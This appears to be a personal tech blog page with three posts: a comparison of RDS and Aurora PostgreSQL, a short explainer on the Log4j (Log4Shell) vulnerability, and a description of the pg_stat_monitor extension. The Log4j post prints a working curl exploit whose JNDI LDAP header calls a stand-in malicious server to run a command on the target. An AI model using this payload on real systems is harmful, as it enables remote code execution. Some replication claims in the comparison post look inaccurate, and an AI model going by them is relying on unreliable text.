Translate into your own language

Wednesday, December 14, 2022

Differences between RDS PostgreSQL and Aurora PostgreSQL

Differences between RDS PostgreSQL and Aurora PosgreSQL

1. Storage Differences

RDS PostgreSQL

RDS PostgreSQL uses Amazon Elastic Block Storage (EBS). All data and logs are managed in the EBS volume attached to the instance. EBS volume is localized to a single availability zone and can not be shared by multiple EC2 instances.

RDS PostgreSQL can grow up to 64TB.

RDS PostgreSQL Automatically scales up 5 GB.

Amazon Aurora PostgreSQL

Aurora uses distributed storage which is replicated across 3 availability zones.

Amazon Aurora PostgreSQL can grow up to 128TB.

Aurora PostgreSQL automatically scales up in chuck of 10GB

2. Replica Differences

RDS PostgreSQL –

RDS uses synchronous streaming replication between primary and read replica.

Maximum of 5 read replica can be added to RDS PostgreSQL.

There is synchronous streaming between Primary and read replica.

Replication lag is in seconds. Sometimes it can be 30 seconds.

RDS supports cross region replication.

 Aurora PostgreSQL

Aurora shares storage tier between primary and read replica. Replica in Aurora cluster shares the Storage volume. Aurora does not depend on streaming replication. All of replication happens at storage tier. Hence it is extremely efficient and does not any load on the compute resources.

Aurora supports up to 15 read replicas.

Replication lag is in mili seconds.

supports same region replication because all read replicas shares the storage tier spread across multiple availability zone in the same region.

3.DR Strategies, High Availability and Failover

From disaster recovery prospective cross region replication is an important concept. And we have seen that RDS PostgreSQL support cross region replication.

With Aurora database with no support of cross region but DB strategies can be implemented by way of Global Aurora Database.

For High availability, RDS PostgreSQL can be setup in multi AZ mode with one standby instance and one primary instance across two AZ’s are referred to as multi AZ instance deployment.

In case of any failure RDS automatically failover to the standby instance. By the way this failover can also be a planned failover. In such a setup standby instance can not be used as read.

If there are more than one standby instance in the multi AZ RDS setup then the setup is referred as multi AZ cluster deployment.  In case of failure of primary instance of request for a manual failover, RDB promotes one of the standby instances to become the primary instance. In this setup standby instance can be used as read replica.

RDS PostgreSQL –

RDS supports failover by way of multi AZ instance or cluster setup.

Failover takes 60-120 sec.

RDS uses synchronous replication between primary and standby instances.

 Aurora PostgreSQL

Aurora supports failover by the way of read replica.

Failover takes 30 Seconds.

Aurora shared the storage tier share between the instances to meet the replication requirement.

4.Backups

Both RDS and Aurora PostgreSQL carry out automated backups and they also allow for manual backups. The differences are in the frequency of backups and how the backups are created.

RDS PostgreSQL –

RDS PostgreSQL takes daily backup during backup window. Backup window is controlled by the user.

Slight performance impact during backup.

In case of multi AZ, backups are taken from standby instance.

Point in time recover is slower than the Aurora PostgreSQL.

Aurora PostgreSQL

Aurora PostgreSQL carries out continuous incremental backups.

No performance impact during backup.

Backup are carried out at storage tier.

Point in time recover is faster than the RDS PostgreSQL.


Tuesday, December 14, 2021

What is Log4JShell Vulnerability and how to remediate it

 The Log4J vulnerability, also sometimes referred to as Log4JShell, can be exploited to allow for the complete takeover of the target to run any arbitrary code.

This affects versions of log4j 2.0-beta9 through 2.14.1 – the current advisory is to update to the fixed release version 2.15.0 or greater.

The Exploit

The most simplistic example being:  

curl https://target.domain.tld -H 'X-Api-Version: ${jndi:ldap://malicious_server/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}' -o/dev/null -v

when executed this runs touch /tmp/pwned on the target system.

There are many such examples being tracked at the time of writing which seeks to either exploit the issue or at the very least confirm the presence of the issue.

Step by Step: How to troubleshoot a slow running query in PostgreSQL

Understanding query performance patterns is essentially the foundation for query performance tuning. It, in many ways, dictates how a database cluster evolves. And then there are obviously direct and indirect cost connotations as well.

PostgreSQL provides very detailed statistics through a number of catalog views and extensions that can be easily added to provide more detailed query statistics. With each view focused on a particular aspect, the picture almost always needs to be stitched together by combining different datasets. That requires effort and still, the whole picture might not be complete.

The pg_stat_monitor extension attempts to provide a more holistic picture by providing much-needed query performance insights in a single view. The extension has been evolving over the past year and is now nearing the GA release.

Some Useful Extensions

Currently, you may be relying on a number of extensions to understand how a query behaves, the time taken in planning and execution phases, min/max/meantime values, index hits, query plan, and client application details. Here are some extensions that you might already be very familiar with.

pg_stat_activity

This view is available by default with PostgreSQL. It provides one row per server process along with current activity and query text.

In case you’d like to learn more about it, hop over to the official PostgreSQL documentation here.

pg_stat_statements

This extension is part of the contrib packages provided with the PostgreSQL server. However, you’d have to create the extension manually. It’s a query-wise aggregation of statistical data with min/max/mean/standard deviation for execution and planning times and various useful information and query text.

You can read more about pg_stat_statements at the official PostgreSQL documentation site.

auto_explain

Another useful extension is provided by the PostgreSQL server. It dumps query plans in the server log for any query exceeding a time threshold specified by a GUC

(Grand Unified Configuration).

You can find more about auto_explain here.

pg_stat_monitor

Whilst all previously mentioned views/extensions are great in their own right, one needs to manually combine client/connection information from pg_stat_activity, statistical data from pg_stat_statements, and query plan from auto_analyze to complete the dataset to understand query performance patterns

And that’s precisely the pain that pg_stat_monitor alleviates.

The feature set has been growing over the past year, with it providing, in a single view, all performance-related information that you may need to debug a low performant query.

Feature Set

Some features that were part of earlier releases are already discussed in this blog, however, for completeness, I’m going to discuss those here as well.

  • Time Interval Grouping: Instead of supplying one set of ever-increasing counts, pg_stat_monitor computes stats for a configured number of time intervals; time buckets. This allows for much better data accuracy, especially in the case of high resolution or unreliable networks.
  • Multi-Dimensional Grouping:  While pg_stat_statements groups counters by (userid, dbid, queryid),  pg_stat_monitor uses a more detailed group for higher precision:
    • Bucket ID (bucket),
    • User ID (userid),
    • Database ID (dbid),
    • Query ID (queryid),
    • Client IP Address (client_ip),
    • Plan ID (planid),
    • Application Name (application_name).

This allows you to drill down into the performance of queries coming from particular client addresses and applications, which we at Percona have found to be very valuable in a number of cases.

  • Capture Actual Parameters in the Queries: pg_stat_monitor allows you to choose if you want to see queries with placeholders for parameters or actual query examples.
  • Query Plan: Each SQL is now accompanied by its actual plan that was constructed for its execution. Also, we found having query parameter values is very helpful, as you can run EXPLAIN on it, or easily play with modifying the query to make it run better, as well as making communication about the query clearer when discussing with other DBAs and application developers.
  • Tables Access Statistics for a Statement: This allows us to easily identify all queries that accessed a given table. This set is at par with the information provided by the pg_stat_statements.
  • Histogram: Visual representation is very helpful when it can help identify issues. With the help of the histogram function, you can now view a timing/calling data histogram in response to a SQL query. And yes, it even works in psql.

  • Functions: It may come as a surprise, but we do understand that functions may internally execute statements!!! To help ease the tracking and analysis, pg_stat_monitor now provides a column that specifically helps keep track of the top query for a statement so that you can backtrack to the originating function.
  • Relation Names: Relations used in a query are available in the “relations” column in the pg_stat_monitor view. This reduces work at your and makes analysis simpler and quicker.
  • Query Types: With query classification as SELECT, INSERT, UPDATE or DELETE, analysis becomes simpler. It’s another effort reduced at your end, and another simplification by pg_stat_monitor.

  • Query MetadataGoogle’s Sqlcommenter is a useful tool that in a way bridges that gap between ORM libraries and understanding database performance. And we support it. So, you can now put any key value data in the comments in /* … */ syntax (see Sqlcommenter documentation for details) in your SQL statements, and the information will be parsed by pg_stat_monitor and made available in the comments column in pg_stat_monitor view.

  • Logging Error and Warning: As seen in different monitoring/statics collector tools, most of the tools/extensions only monitor the successful queries. But in many cases, monitoring ERROR, WARNING, and LOG give meaningful information to debug the issue. pg_stat_monitor not only monitors the ERROR/WARNINGS/LOG but also collects the statistics about these queries. In PostgreSQL queries with ERROR/WARNING there is an error level (elevel), SQL Code (sqlcode), and an error message is attached. Pg_stat_monitor collects all this information along with its aggregates.

We’ve Come a Long Way

What started as a concept is now nearing its final approach. The pg_stat_monitor extension has evolved and has become very feature-rich. We have no doubt about its usefulness for DBAs, performance engineers, application developers, and anyone who needs to look at query performance. We believe it can help save many hours and help identify unexpected query behaviors. 

pg_stat_monitor is available on Github. We are releasing it to get feedback from the community on what we’re doing right and what we should do differently before we release pg_stat_monitor as a generally available version to be supported for years to come.